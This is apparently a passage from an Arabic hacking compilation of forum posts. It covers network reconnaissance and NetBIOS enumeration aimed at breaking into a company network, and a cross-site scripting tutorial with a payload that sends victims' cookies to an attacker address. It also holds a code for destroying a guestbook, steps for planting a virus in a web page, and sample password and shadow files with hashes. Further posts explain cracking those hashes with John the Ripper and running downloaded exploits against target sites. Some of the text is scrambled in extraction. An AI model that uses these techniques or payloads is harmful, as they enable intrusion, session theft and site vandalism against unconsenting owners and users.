‫فيه طرق معروفه تمكنك من الدخول ولو بنسبه ‪ %50‬على اغلب السيرفرات الموجوده بالعالم لحظ ‪%50‬‬
‫اول الجهمات الولى دائمايكون الغرض منها تكوين معلومات عامه عن السيرفر الذي يراد مهاجمتته ومن‬
‫هنا نبدا الهجوم وعلى اي اساس يتركز الهجوم‬
‫احيانا يكون هجوم حرمان خدمه واحيانا هجوم اقتحام كامل حسب الموجود والمتوفر والمعلومات الموجوده‬
‫لدينا‬
‫طيب لنفرض اننا ودنا نخش على شركه معينه باسم ‪ aswind.COM‬الخطوه الولى هي التعرف على مدى‬
‫عنوان ‪ ip‬الخاصه بهذه الشركه وهذا سهل‬
‫اول شي انصح بالتسجيل في موقع ‪INTERNIC.NET‬‬
‫حتى يعطونك خدمات تستاهل‬
‫هناك طريقتين لمعرفه الي بي اول‬
‫عن طريق الموقع ‪INTERNIC.NET‬‬
‫والثانيه عن طريق برنامج الدوس بالمر ‪:‬‬
‫‪NSLOOKUP‬‬
‫‪SET TYPE = ALL‬‬
‫‪aswind.COM‬‬
‫راح تطلعلك المعلومات هذي بالضبط ‪:‬‬
‫‪Domain Name: ASWIND.COM‬‬
‫‪264‬‬

‫‪.Registrar: ONLINENIC, INC‬‬
‫‪Whois Server: whois.OnlineNIC.com‬‬
‫‪/Referral URL: http://www.onlinenic.com‬‬
‫‪Name Server: DNS.ASWIND.COM‬‬
‫‪Name Server: NS1.ASWIND.COM‬‬
‫‪Updated Date: 01-apr-2002‬‬
‫معنا الكلم هذا ان شركه ‪ aswind.com‬وضعت ارقام الملقامات الخاصه ب ‪DNS = 2‬‬
‫يعني عدد ‪ 2‬خادم ‪ DNS‬وسوت لها نشر يعني هناك على القل سيرفرين شغالين بخدمه ‪ DNS‬يعني هم‬
‫يتعتقدون ان الموضوع ماراح ياخذ كثير من طاقه التشغيل للجهزه خاصه ‪DNS‬‬
‫هنا في مجال للدخول وتعديل بيانات ‪ DNS‬بمعنى ان العمليه تصير واسعه شوي‬
‫فقط قم بنشر عنوانين من عنواوين ‪ Ip‬فقط مثل ماسوو ‪ aswind.com‬لكن لنفترض انه فيه اكثر من‬
‫عنوان لنفول ‪ 6‬مثل ‪.‬‬
‫عشان كذا اقترح على الشركات وضع عنواونين ‪ IP‬للنشر ووضع خوادم ‪ DNS‬على اجهزه قديمه وبطيئه‬
‫لنك اساسا في حاجه ل ‪ DNS‬دايناميكي وهذا يعني انك تقوم بتشغيل ‪ WIN2K‬وخدمه ‪ DNS‬على جهاز‬
‫واحد وهذي من الفكار الجيده في نظري اذا وضعت جهاز خاص فقط بال ‪DNS‬‬
‫طيب لنفرض انك مالقيت شي على اجهزه ‪ DNS‬وبما انك في بدايه هجوم هذا يعني انه عندك متسع من‬
‫الوقت اذن قم بتجريب جميع العناوين المتوفره لديك والتي حصلت عليها من ‪ HowIS‬وصدقوني فيه ادوات‬
‫موجوده بالنت مممكن انها تمسح مجموعه ‪ IP‬موجوده في شبكه معينه‬
‫طيب قم بعمل ملف اسمه ‪ LMHOSTS‬يوجود فيه اسم ‪ NetBios‬لكل عنوان ‪ IP‬استطعت انك تحصل‬
‫عليه‬
‫يعني انت عرفت ان الشبكه من كلس ‪ C‬وعنوانها ‪ 200.200.200.0‬سو لك ملف ‪ LMHOSTS‬باسم‬
‫‪ NetBios‬وملف باسم ‪ N2 = 200.200.200.2‬وهكذا بعدين تحتاج عمل ‪Net view‬‬
‫‪ //servername‬لكل اسم من ‪ N1‬إلى ‪ N254‬يعني كانك تسوي سكان بورت بس بطريقه ثانيه‬
‫من جهاز رقم ‪ 1‬إلى جهاز رقم ‪254‬‬
‫وبالنسبه للجهزه الصحيحه سوف تشتغل الخدمه فيها ام العناوين الغير متصله فلن تستجيب طبعًا‬
‫طيب انت ال الن ماتقدر تسوي شي \‬
‫بس تقدر تتاكد من حساب ‪ Administrator‬موجود وال ل او تم تغييره او اذا هناك يوزر نيم بنفس‬
‫الصلحيات انت بطبيعه الحال ماتقدر تحصل عليه بسهوله‬
‫اذن هناك ابواب خلفيه للحصول عليه من بعض الطرق الوصول لبعض اسماء المستخدمين الموجودين في‬
‫الشركه وهذا يعتبر عيب من عيون ‪ Windwos‬لنها تطنشهم ههههههههه مدري ليش‬
‫فيه امر تقدر تعرف من خلله بس أل الن انت ماتقدر تسويه لنه مالك حق وصول مباشر يعني انت لزم‬
‫تحصل على ‪ username and password‬لي يوزر موجود في المجال المر هو ‪ net user‬وهو‬
‫يستعرضلك جميع المستخدمين الموجودين بالمجال‬
‫لكن فيه طريقه للحصول على اسماء بالهبل ههههههه‬
‫كيف ؟؟‬
‫الن عندما يقوم مستخدم بتسجيل دخول يقوم جهازه ليس فقط بتسجيل اسمه فقط بل اسم جهازه يعني على‬
‫سبيل المثال مدير الشبكه اذا صار عنده زحمه يشغل خدمه اسمها مراقبه النظام حتى يعرف انه وصل للحد‬
‫القصى‬
‫عندما يقوم مستخدم بتسجيل الدخول تقوم خدمه ‪ Messenger Service‬بتسجيل اسم المستخدم كاحد‬
‫اسماء ‪ NetBios‬الموجودين في الشبكه الي انت اساسا جالس تبحث عنهم وعلى افتراض انك دخلت على‬
‫خادم بعنوان ‪ IP 200.200.200.200‬فأن اي شخص اذا قام بعمل ‪nbtstat -a 200.200.200.200‬‬
‫سيتكمن من معرفه اسم جهازك واسم المستخدم واذا كان جهازك ‪ MSBROWSER‬او ل ) سوف اتحدث‬
‫عنها بالتفصيل (‬
‫طيب لنفرض ان فيه شخص باسم ‪ John‬ورقم ‪IP 200.200.200.50‬موجود في الشبكه فانك اذا قمت‬
‫بعمل ‪ Nbtstat -a 200.200.200.50‬راح يضهرلك انه فيه شخص باسم ‪ john‬واسم جهازه‬

‫‪265‬‬

‫‪johnPC‬‬
‫الن موجود معك اسم مستخدم ) احتمال يكون ‪( Administrator‬طيب وش نسوي‬
‫؟‬
‫قوم بتعطيل خدمه ‪ Messenger Service‬في جهزك ) ولن يتم تسجيل اسمك في النطاق يعني بتخش‬
‫مخفي (‬
‫وبالسنبه ل ‪ MSBROWSER‬اذا شفتها بعد عمل المر ‪nbtstat -a‬‬
‫هذا يعني انه استعراض رئيسي للمجال وهذا من اكبر الخطاء التي يقومون بها مدراء الشبكات لن مراقب‬
‫المجال يدوخ ل يستطيع التجميع وتستطيع استغلل مثل هذه الثغرات دائما في الشبكات الداخليه‬
‫طيب انت الن حصلت على اسم المتسخدم‬
‫انت محتاج كلمه المرور وهذي هي المشكله يعني انت ضميت جهازك مع الشبكه لكن ماقدرت تحصل على‬
‫كلمه المرور لكن تقدر تحصل عليها ‪ nt senstiver‬او متحسس الشبكه ) معليش ماني متاكد من السبيلنق‬
‫(‪.‬‬
‫طيب كيف اقدر احصل فعليا على كلمه المرور‬
‫غالبا ماتكون كلمات مرور المستخدمين تاففه جدا هاذ اذا وجدت اصل‬
‫يعني برنامج مثل ‪ l0pthcrack‬يحل لك المشكله‪.‬‬
‫انتهى‪،،،‬‬

‫‪266‬‬

‫" ‪" Cross Site Scripting‬‬
‫>منقول من منتدى الحلم<‬
‫>الكاتب‪<tcp :‬‬
‫المتطلبات ‪:‬‬
‫معرفة تامه بلغة ‪HTML‬‬
‫اطلع غير متعمق على لغات السكربتينق وهي ‪JAVASCRIPT ,PERL ,CGI ,VBSCRIPT‬‬
‫ومن وجهة نظر شخصية المصايب كلها من الجافا سكربت والهتمل‬
‫===========================================================‬
‫====================================‬
‫الهداف المنشوده ‪:‬‬
‫* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم‬
‫* اختراق المنتديات من نوع ‪ VBULLETIN‬او ‪ YaBB and UBB‬او المجلت من البهب نيوك او‬
‫بوست نيوك‬
‫*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين‬
‫* ان يستطيع القارئ توسيع مداخل الختراق‬
‫===========================================================‬
‫=====================================‬
‫جمله عرضية ‪:‬‬
‫الختراق ليس ال تشغيل للمخ واستغلل لشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود‬
‫على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او‬
‫‪267‬‬

‫المواقع التي تطرح الثغرات المنية ‪...‬هل نحتاج الى امة تطور نفسها ‪ ..‬ام نطور انفسنا نحو المية‬
‫===========================================================‬
‫=====================================‬
‫المشكلة ‪:‬‬
‫كما هو معروف فان مستعرضات الوب مثل الكسبلورر او نت سكيب ‪ ...‬الخ تاتي مترجمات النصوص او‬
‫السكربتات‬
‫مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين‬
‫فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه ‪.‬‬
‫اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية‬
‫او قد تستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين‬
‫المثال التالي يوضح كيفية ادراج السكربت ‪:‬‬
‫‪.Hello FOLKS board. This is a message‬‬
‫>‪<SCRIPT>malicious code</SCRIPT‬‬
‫‪.This is the end of my message‬‬
‫ان كلمة ‪ malicious code‬تم ادرجها او حقنها في بين علمتي السكربت وقد تحتوي على كود خبيث‬
‫يسرق او يرسل بيانات ‪ ...‬الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها ال اذا مكنها الدمن‬
‫او المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل ‪ HTML‬مثل يتم ادراج السكربت مكان خاصية المج‬
‫>‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬
‫او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق‬
‫المسنجر‬
‫والمثال التالي يوضح لك كيفية عمل رابط في صفحة‬
‫>?‪A HREF="http://example.com/comment.cgi‬‬
‫‪<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A‬‬
‫انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعله وتضغط عليه سينفذ‬
‫السكربت‬
‫وللشرح اكثر لنفرض ان السكربت ‪ comment.cgi‬سكربت يرسل ملحظاتك لصاحب الموقع او قد يكون‬
‫سكربت للبحث‬

‫‪268‬‬

com/pub/a/2002/02/20/css.cgi? mycomment=<SCRIPT‬‬ ‫‪<SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A‬‬ ‫هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخر‬ ‫والذي‬ ‫هو بالسم ‪ BADFILE‬ولن مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأن‬ ‫هذا الهجوم‬ ‫يسمى ب ‪ cross-site scripting‬او الترجمه من عندي " برمجة عبور الموقع " لننا عبرنا باستخدام‬ ‫برمجة‬ ‫السكربتات اكثر من موقع واذا كنت تلحظ في السيكيورتي فوكس او المواقع المنيه تختصر ب ‪ CSS‬وهي‬ ‫اختصار‬ ‫ل ‪ cross-site scripting‬وليس ل ‪ CASCADE style sheets‬اي اوراق النماط المتتالية‬ ‫قد يدخل بدل الوسم او علمة السكربت اي من الوسوم التالية‬ ‫>‪<SCRIPT>. <OBJECT>.com/comment.html‬‬ ‫‪http://www. <APPLET>.perl.‬‬ ‫وحتى اعقد المور اكثر‬ ‫لحظ المثال التالي ‪:‬‬ ‫>‪A HREF="http://example.org/advisories/CA-2000-02.html‬‬ ‫‪269‬‬ . and <EMBED‬‬ ‫ومن الممكن ان يكون هناك وسم النماذج >‪ <form‬من وسوم ‪ HTML‬وبنفس الفكار السابقة يمكن تنفيذ‬ ‫الوامر‬ ‫منها لسرقة الكوكيز او بيانات اخرى او توجيهك لصفحات اخرى‬ ‫اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع الن ان تفهم ما اقصده‬ ‫=========================================================‬ ‫ولمزيد من التفاصيل ‪:‬‬ ‫‪http://www.cert.‫في الموقع او المنتدى وهو يحتوي على متغير داخله اسمه ‪ mycomment‬ياخذ المدخلت او الملحظات‬ ‫التي تكتبها‬ ‫فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان‬ ‫ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لحظ الفكره هنا فقد ضمن السكربت داخل‬ ‫حقل نصي فبدل من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت ‪.

.‬‬ ‫‪..‬‬ ‫‪...‬‬ ‫‪...‬‬ ‫‪..‬السم‪ -‬اليميل‪ -‬موقعك الشخصي‪-‬تقديرك للموقع‪ -‬طريقة الستدلل‪.‬‬ ‫‪.‬انتم تعرفون طبعا كيفية عمل توقيع في‬ ‫سجل الزوار‪....‬‬ ‫‪.‬‬ ‫‪.‬‬ ‫‪.‬‬ ‫‪.‬‬ ‫‪..‬‬ ‫‪...‬‬ ‫هذا هو الكود ‪:‬‬ ‫==================================================‬ ‫=‬ ‫‪--><h3>put your text here<xmp><plaintext‬‬ ‫==================================================‬ ‫‪270‬‬ .‬كبير بقدرته على تدمير سجل الزوار بالكامل‪..‬نقف ونكتب‪:‬‬ ‫‪.‫انتهى‪،،،‬‬ ‫" كود تدمير سجل الزوار "‬ ‫>ةةةةة ةة ةةةةةةة ةةةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةةة<‬ ‫كود صغير جدا بحجمه‪..‬‬ ‫‪..‬والنقطه المهمه وهي‬ ‫كتابة تعليقك على الموقع؟؟؟؟؟؟؟‬ ‫نحن سوف نضع كل شي حسب ما هو مطلوب ولكن عندما نأتي لكتابة التعليق‪..

‬‬ ‫انتهى‪،،،‬‬ ‫‪271‬‬ ..‬هايطلعلك جدول صغير من خانتين ‪ ....‬انت عليك تحط في المربع‬ ‫ده كود الفيرس وتضغط موافق ‪ (:‬وكده الطبخة استوت ‪..‬خليك في الخانة الولى اللي على اليمين‬ ‫واختار منها ااخر اختيار اللي هو "عناصر تحكم متقدمة" اضغط ضغطه واحده وهايظهرلك عناصر في الخانه‬ ‫اللي على اليسار اختار اول اختيار اللي هو "‪ . "HTML‬هايفتحلك مربع تاني‪ ..‬هاتلقي تحت ثلث مربعات الول عادي والثاني ‪ html‬والثالث معاينة‬ ‫انت خليك في العادي‬ ‫اختار ادراج‬ ‫ثم اختار مكون ويب‪ .‬‬ ‫واوعى تضغط على معاينة الصفة وانت معندكش نورتن لكن لو عندك هايديك تحذير بوجود فيروس‬ ‫الطريقه للي عنده فرونت بيج عربي واللي عنده انجليزي هي نفس الخطوات مع تغيير السامي‪... put your text here‬وهذا كل شي ‪.....‫يمكنك كتابة اي شي تريد في مكان ‪.....‬بعد توقيعك اعمل‬ ‫ريفريش وانظر ماذا حصل‬ ‫ملحظه‪:‬‬ ‫=====‬ ‫الكود ل يعمل مع بعض انواع سجل الزوار؟!‬ ‫انتهى‪،،،‬‬ ‫" وضع فايروس في صفحة "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<Dr^FunnY :‬‬ ‫اختار صفحة جديدة ‪ ...

/www......‬يمكن استخدامها في لينوكس فقط‬ ‫ثغرات بلغة شل‬ ‫*‪sh..com‬‬ ‫‪www..!!.‬وستعرف بعض المعلومات عن الموقع كليبي ونظام التشغيل‪.‬إلخ‬ ‫أول يجب أن تجمع كل المعلومات الممكنة حول الموقع ‪:‬‬ ‫‪ -1‬المنافذ المفتوحة مثل الف تي بي والتلنت مثل وهذ عن طريق برامج مثل‬ ‫‪super scan‬‬ ‫ابحث عنه في النترنت‪.securityfocus.‬ويمكن استثمارها في لينوكس فقط‬ ‫ويمكنك إيجاد الكثير من النواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها‬ ‫‪www.netcraft.com‬‬ ‫‪272‬‬ .f2s..‬‬ ‫‪ -2‬معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به‬ ‫واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لخر‪.com‬‬ ‫والنواع الباقية أو الستثمارات ‪:‬‬ ‫ثغرات مكتوبة بلغة بيرل *‪pl.com‬‬ ‫‪www.‬‬ ‫لمعرفة نظام التشغيل إذهب إلى الموقع‬ ‫‪www.securify..ukrt.com‬‬ ‫‪www.com‬‬ ‫‪www.‬‬ ‫ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج‬ ‫‪Active Perl‬‬ ‫ثغرات بلغة سي‬ ‫*‪ c.securiteam.thesite.‬إلخ‬ ‫‪ -3‬معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك‬ ‫‪ -4‬معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي‬ ‫أنواع الثغرات‬ ‫أبسط النواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل‬ ‫‪/.‫" الثغرااات "‬ ‫>ةةةةة ةة ةةةة ةةةةةة<‬ ‫‪ = Exploit‬اسثمار = ثغرة‬ ‫الجزء المهم‪:‬‬ ‫الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغللها للحصول على ملف الباسوورد وقاعدة‬ ‫البيانات وووو‪.packetstorm.ussrback.net‬‬ ‫واكتب الموقع ثم إنتر‪ !.

‬‬ ‫ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثل وعليك وضع الكلمة المشفرة بدل من ال ‪ x‬وعليك‬ ‫ترتيبها بحيث يكون كل حساب في سطر‬ ‫طريقة تشغيله‪:‬‬ ‫إذهب إلى الدوس واكتب‬ ‫‪john passwd‬‬ ‫حيث ‪ passwd‬هو الملف الذي به الباسوورد المشفرة وضعتها‬ ‫‪273‬‬ .‬المشكلة أن كلمةالسر تكون بداخله مضللة ‪shadowed‬‬ ‫أو مشفرة ‪.passwd or /etc/shadow‬والجديد هو ‪x‬‬ ‫‪token‬‬ ‫‪IRIX : /etc/shadow‬‬ ‫‪token = x‬‬ ‫‪! = AIX : /etc/security/passwd‬‬ ‫‪token‬‬ ‫‪* = ConvexOS : /etc/shadow or /etc/shadpw‬‬ ‫‪token‬‬ ‫مثال لملف شادو‬ ‫‪::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪::::::lp:NP:6445‬‬ ‫نجد أن كلمة السر هي‬ ‫‪EpGw4GekZ1B9U‬‬ ‫كيف تفك التشفير؟‬ ‫عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات‬ ‫‪John the ripper‬‬ ‫وهو يقوم بتجريب كل المحاولت الممكنة حتى يحصل على الباسوورد ‪.secureroot.‬‬ ‫كلمات السر السابقة مضللة وهي علمة ‪x‬وقد تختلف‪.com‬‬ ‫أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج‪.encryption‬‬ ‫مثال لملف باسوورد‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫ولن ملف الباسوورد يحتوي على كلمات سر الشخاص المرخص لهم بدخول الموقع قد ل بزيد عن عشرة‬ ‫أسطر وقد يصل آلف السطر‪.‬‬ ‫ويمكنك من خلل البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن‬ ‫ثغرات لها في مواقع الثغرات أو المواقع السابقة‪.‬وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك‬ ‫بحث أو حتى عداد زوار‬ ‫حسنا لنفرض أنك حصلت على ملف الباسوورد‪..rootshell.‬‬ ‫أما المشفرة والتي سنحصل عليها تكون هكذا‪:‬‬ ‫مضللة ‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫مشفرة ‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬ ‫‪ = root‬أو الجذر اسم المستخدم‬ ‫‪ = x‬كلمةالسر ولكنها مضللة‬ ‫وباقي السطر غير مهم‬ ‫في الغلب ستكون كلمة السر مضللة ‪ shadowed‬لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر‬ ‫مشفرة يسمى ملف الشادو‬ ‫‪shadow file‬‬ ‫ويوجد في أماكن معينة تختلف باختلف نظام التشغيل‬ ‫‪ = token‬الرمز الذي يعبر عن الباسوورد‬ ‫‪* = Linux : /etc/shadow‬‬ ‫‪token‬‬ ‫‪ = SunOS : /etc/shadow‬يأخذ أشكال متعدده اشهرها هو *‬ ‫‪token‬‬ ‫‪ * = FreeBSD : /etc/master..com‬‬ ‫‪www.‫‪www...

‬و الرووت هو عباره‬ ‫عن الدمينيستراتور او مدير النظام الذي تريد اختراقه ‪.‬‬ ‫اما عن طريق التطبيق مباشره من خلل المتصفح كما في حاله بعض ثغرات امتصفح مثل اليونيكود او‬ ‫الفرونت بيج‬ ‫او ان تستخدم السكانرز في فحص الموقع ‪..‬‬ ‫و يوجد ايضا الثغرات التي تتيح لك تنفيذ بعض الوامر مثل عرض و مسح و الكتايه على الملفات‬ ‫مث الكستينشنز و غيرها ‪.......‬بالنسبه لموضوع البوفر اوفر فلو فهو يشبه الى حد كبير‬ ‫ال ‪ DoS‬حيث يعتمد على ارباك السيرفير بفيض من المعلومات و يمنحك الرووت ‪...‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××‬ ‫‪: a face at the interface‬‬ ‫الستثمارات تستخدم عاده لكي تحصل عل الرووت عل نظام معين ‪......‬فانه يوجد طريقتين لمعرفه ما اذا كانت الثغره موجوده ام ل‪. OFFLINE‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××‬ ‫‪ 1‬كيف تجد استثمارات ؟‬ ‫لكي تستطيع ان تستثمر ثغره معينه في سيرفير فانه يجب عليك اول ان تتاكد ان الثغره موجوده في السيرفير‬ ‫و لما كان الستثمار عباره عن فايل معين ‪.‬‬ ‫‪274‬‬ ..‬الستثمارات دايما ما توجد‬ ‫بواسطه ملف معين يجعك تستطيع الدخول بواسطه ال ‪ http‬بصوره طبيعبه ‪.‬طبعا من المعروف ان ثغرات المتصفح لها سكانرز ال‬ ‫‪threads‬‬ ‫و هي تسمى ال ‪ cgi scaners‬بعضها ممكن ان تضيف له ملفات بها ثغرات و البعض الخر يكون‬ ‫جاهزا ‪.‬‬ ‫انتهى‪،،،‬‬ ‫" شرح شبه مفصل عن الثغرات "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< icer :‬‬ ‫الموضوع اليوم ينقسم الى التالي ‪:‬‬ ‫‪ 1‬كيف تجد اكسبلويتات ؟‬ ‫‪2‬كيف تستعمل الكسبلويتات ) دعونا نسميها استثمارات ( ؟‬ ‫‪ 3‬انواع مختلفه من الستثمارات ‪.‬‬ ‫لذلك نستخدم ‪ scanner‬لبحث عن هذا الستثمار ‪.pot‬‬ ‫وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه ‪..... DoS ( denial of service‬‬ ‫و على فكره انا ا اؤمن ان ال هجوم ال ‪ DoS‬هي اكسبلويت ‪.John the Ripper Version 1..‬‬ ‫‪ 4‬مواقع مفيده للبحث عل الثغرات ‪.3 Copyright (c) 1996‬‬ ‫‪Loaded 1 password‬‬ ‫**‪v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫وإذا أردت معرفة الباسوورد التي يخمنها الن اضغط انتر‬ ‫والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه‬ ‫‪john. (BOF (buffer over flow) ..‬‬ ‫اما هجوم ال ‪ DoS‬فهو عباره عن ارسال ‪ GET / POST‬ال السيرفير مما يؤدي ال‬ ‫حدوث ‪ OVERLOAD‬لوحده المعالجه المركزيه للسيرفير )اللي هو عباره عن جهاز يعمل‬ ‫‪ 24‬ساعه ( فيتوقف الموقع عن العمل و يصبح السيرفير ‪.‬يو جد العديد من الستثمارات مثل‬ ‫‪.‫سيظهر ‪:‬‬ ‫‪by Sola 97...

‬‬ ‫و كيف تستخدمها و اشياء زي كده ‪..com /.... http‬و ال ‪ BOF‬و‬ ‫غيرها ‪.(:‬‬ ‫انتهى‪،،،‬‬ ‫‪275‬‬ ...‬فهي قد تعطي لك صلحيه قراءه و حذف و الكتابه عل الملفات و ايضا‬ ‫رفع ملفات الى السيرفير ‪........‬‬ ‫كها تعتمد على طريقه عمل الثغرات ‪ .2‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫××××××××××××××××××××××××××××××××××‬ ‫‪ 2‬كيف تستغل هذه الثغرات ؟؟‬ ‫الكثير من الناس عندما يفحصون موقع بسكانر )و خاصه ال ‪ ( shadow‬و يطلع لهم استثمارات معينه ‪...‫و هناك نوع اخر من السكانرز و ان احبذه ‪<<< shadow security scaner...‬ل‬ ‫يعرفون ايش يسوون‬ ‫بعد كذا؟؟؟؟‪.com /www...‬اي لك كل الصلحيات على‬ ‫السيرفير‬ ‫و الحصول على الرووت يمكن ان يتم من خلل العديد من الثغرات مثل ثغرات ال ‪ ..‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××××××‬ ‫‪ 3‬انواع مختلفه من الستثمارات ‪:‬‬ ‫طبعا الكثير من الستثمارات يكون هدفها هو منحك الرووت على السيرفير ‪...‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××××××‬ ‫‪ 4‬مواقع مفيده للبحث عن الثغرات من خللها ‪:‬‬ ‫يمكنك البحث عن الستثمارات الجديده في هذه المواقع ‪:‬‬ ‫‪packetstorm..‬‬ ‫او قد تعطي لك الكلمه السريه و اسم اليوزر اما في صوره واضحه مثل الملف ‪ config.. etc/passwd/‬في انظمه اليونيكس ‪.‬تزرو العنوان ده و تقره كل كلمه تلقيها هناك ‪..inc‬او مشفره‬ ‫بمقياس‬ ‫‪ ..org‬‬ ‫‪ /www.com‬و غيرها ابحث سوف تجد المزيد ‪..insecure...‬‬ ‫‪.com‬و هو‬ ‫يحتوي على‬ ‫محرك بحث يكفي ان تضع مفتاح للبحث عباره عن كلمه واحده او كلمتان مثل ‪ red hat 7...‬ل يوجد اي قيود على ال ‪ commands‬اللي الرووت يكتبها ‪.com‬‬ ‫و تكتب في محرك البحث اسم الثغره و انت ان شاء ال في ‪ %99‬من الحالت بتلقي استثمار لهاي الثغره‪.‬‬ ‫بالنسبه للبفر اوفر فلو فهو يشبه الى حد كبير هجوم ال ‪ DoS‬و لكنه ل يسبب ضرر للسيرفير مثلما يسببه‬ ‫هجوم ال ‪ DoS‬المهم انه في اغلب الحيان يكون البفر عباره عن ارسال اوامر للسيرفير تنتهي دائما‬ ‫باعطائك‬ ‫صلحيه الرووت ‪ ...‬‬ ‫لو انت بتستعمل الشادو حتلقي ‪ url‬بجانب الثغره ‪.‬‬ ‫او اذا لم تجد اي ‪ url‬في السكانرز الخرى يبقى تاخد اسم اثغره و تروح الموقع ‪rootshell..securify.‬و هذا بسبب استقبال السيرفير لكم هائل من الداتا فيؤدي الى ارباك السيرفير ‪.‬معنى كلمه رووت هو المدير‬ ‫او الدمين ‪ ...rootshell.2‬و سوف تجد‬ ‫العديد من الثغرات التي تحتوي على‬ ‫‪. DES/MD5‬كما في الملف ‪ ...securityfocus.... red hat 7.‬على فكره من احسن المواقع التي يمكن ان تجد بها احدث الثغرات هو ‪ rootshell.

...‬واغلب الثغرات يتم كتابتها بالسي‪. :‬‬ ‫هو برنامج سي لكنه سورس كود فقط‪. :‬‬ ‫برنامج بيرل‪.xxx.‬اكمل القراءة لتعرف كيفية استخدامها‪..‬لتشغيله ايضا تحتاج ‪ Linux‬او ‪Shell Account‬‬ ‫اذا كان ‪ exploit‬واردت ان تطبقه على موقع اكتب‪:‬‬ ‫‪perl filename.‬‬ ‫‪c...out‬وهو البرنامج الناتج‪.‬البير‪..c‬امر الكومبايل‬ ‫سينتج الملف‪:‬‬ ‫‪ >--.pl xxx.‬‬ ‫كمثال‪:‬‬ ‫‪a.‬هذا يفترض عليك‬ ‫عليك تحميله ثم عمل )‪_ (compile‬وهذا يعني تحويل السورس كود لملف )برنامج(_ ثم تثوم‬ ‫بتشغيله‪.‬‬ ‫للثغرات المكتوبة بالبيرل‪:‬‬ ‫‪pl.‫" كيف تستخدم الثغرات "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<oOoDa BE$T :‬‬ ‫البداية‪:‬‬ ‫‪txt.xxx‬‬ ‫او‬ ‫‪filename xxx.xxx..xxx/.‬‬ ‫‪276‬‬ .xxx..xxx.‬من الممكن اي يحتوي على سورس كود لبعض الثغرات او البرامج المكتوبة بالسي‬ ‫‪ .‬لكن المشكلة هنا انه لن يمكن تشغيلها تحت بيئة ويندوز‪.‬فيجب ان يكون عندك ‪ Linux‬او‬ ‫‪...out xxx. :‬‬ ‫ويعني ملف ملف نصي‪..xxx.‬‬ ‫والن ماذا ينقصك؟؟‬ ‫يجب ان يكون معك اي بي او اسم الموقع الذي تريد ان تطبق عليه الثغرة‪.xxx/.a. Shell Account‬‬ 